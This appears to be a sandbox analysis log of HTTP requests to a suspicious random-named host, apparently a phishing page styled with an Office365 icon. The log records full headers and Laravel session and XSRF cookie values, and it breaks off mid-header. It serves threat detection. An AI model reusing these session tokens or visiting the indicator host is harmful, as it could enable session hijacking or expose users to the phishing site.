              Source: global trafficHTTP traffic detected: GET /yzyL39APlvjnlq1ppBWtnJYuv3Nymnp6erd3vFeg2V9rHBEqL4690179 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rse78Bu8wNVAGneDhXNWxmUQtGFEK55nghvksAYgzKamMRP8E6ZZ6UnZ9Zte71VOef200 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijq0GXuThn3eYSabiYAx9qo9lB6ksy0fMmudSZKutxyUkYF0XxMNi130dfxbM4xef210 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxdC57pVq7OFKAZ3ckUst5gc4IjmY47Il0FITRSk34130 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opHEkFr4q1WYO5T8k73FNznYcuhCiUef12JKL94q3dnBi6rN67131 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /integrations/office365/images/icon-80.png HTTP/1.1Host: app.mockflow.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ef7Ix5bMCWZ8fN6mjluRrrPLIbOzElXijXDPs7OuLhBG890145 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opDKN2QliBSAjkfGHHCvfE9bIDoWuqGqXD12ZVJwljwbfR0D65xwnlt20ekckBZU8kgTjcd238 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klBcnDvaiorUutbh5B3Adjn4Q5P6J55tBLVCjJ9xNFE56CgQsKJMuRo2uconQpvHSdX2RE5pEuv214 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzyL39APlvjnlq1ppBWtnJYuv3Nymnp6erd3vFeg2V9rHBEqL4690179 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stQkM4Uk4MddyBfBYuWKxUiORNFVu3l67OFUF9h0Utq8kgczgm10O7gzhdgaHwUyVggh251 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kl4lB5NwdKx55JKSBrT1syOqZ5AE2wi6lKKLXcdqmKvsRgFbLliPAdS7m78168 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rse78Bu8wNVAGneDhXNWxmUQtGFEK55nghvksAYgzKamMRP8E6ZZ6UnZ9Zte71VOef200 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijq0GXuThn3eYSabiYAx9qo9lB6ksy0fMmudSZKutxyUkYF0XxMNi130dfxbM4xef210 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjYwc0p1QUlsa3gzNVkzdG12bU9ha3c9PSIsInZhbHVlIjoiTnpNU1p2ZGdtRVFYRTBsdVpBKzdia3ZaYk4wbzQ5V2djT3hHQjZlT09zMTV0Y0JkSXhTMHRZNWx2TVlQd2Z4cWVmL3hVMnFmRmcvcWxBR0hlRVUvdmFYNXZ6VCtTdENVS1k5RnYrSmU0OVNSZFJkMnRvMjBham9XeFZ6QStTNXgiLCJtYWMiOiJkMjQ4ZTFlYWYyN2E3NjNjNjRhN2IyODFmNzJlYWU3OWZhMzZmMzU4YmFjNmUwZTk2ODI2ZjU2NjMwZWM2YzM5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilk3Nlk0dk9xSWNyTnNNWGV2Z2N1Zmc9PSIsInZhbHVlIjoicS9ETXdkRDRocmFTN0lhWWRyZVUzZFRwdXVSNEw4YXA2c3BVRUZjMFEvMXRQeG4rZGlTbmtnaUlNOGNHZDNRYlFIU1BjSUJLQTZYdUZyS21oMHBjQlY2Z2pkOEd0bVZDNnRCQnBNYWhUUDRUciszaUlOWVh0M1JvT2ZOVDFIU0kiLCJtYWMiOiI0N2UzMThlZGM0NDljZTM5MmUyMTNiYmRmNDQzODhlMDNjODU1ZmJkN2IxNjMzMDZlMGQwOWViYWUxNmVlYmE3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opDKN2QliBSAjkfGHHCvfE9bIDoWuqGqXD12ZVJwljwbfR0D65xwnlt20ekckBZU8kgTjcd238 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 